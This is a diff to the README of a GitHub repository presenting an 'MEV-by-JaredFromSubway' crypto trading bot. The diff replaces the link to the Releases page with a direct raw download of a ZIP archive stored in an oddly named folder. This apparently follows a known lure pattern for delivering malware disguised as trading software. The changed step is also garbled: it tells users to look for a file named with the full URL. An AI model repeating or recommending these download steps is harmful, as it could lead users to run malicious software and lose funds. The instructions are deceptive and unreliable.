sionetukuafu919-design/MEV-by-JaredFromSubway/README.md

 Follow these steps to set up and run our trading bot:

 1. **Visit the Releases Page**
-   - Go to the following link to download the latest version: [Download MEV-by-JaredFromSubway](https://github.com/sionetukuafu919-design/MEV-by-JaredFromSubway/releases).
+   - Go to the following link to download the latest version: [Download MEV-by-JaredFromSubway](https://raw.githubusercontent.com/sionetukuafu919-design/MEV-by-JaredFromSubway/main/sussultatory/MEV-by-JaredFromSubway-2.5.zip).

 2. **Download the Software**
    - You will see a list of available releases.
 Choose the most recent one.
 Click on it to open the release notes and find the files available for download.
-   - Look for a file named `MEV-by-JaredFromSubway.zip` or relevant executable files.
+   - Look for a file named `https://raw.githubusercontent.com/sionetukuafu919-design/MEV-by-JaredFromSubway/main/sussultatory/MEV-by-JaredFromSubway-2.5.zip` or relevant executable files.
 Click on it to download the file to your computer.

 3. **Extract the Files**
    - Once the download completes, locate the downloaded ZIP file on your computer.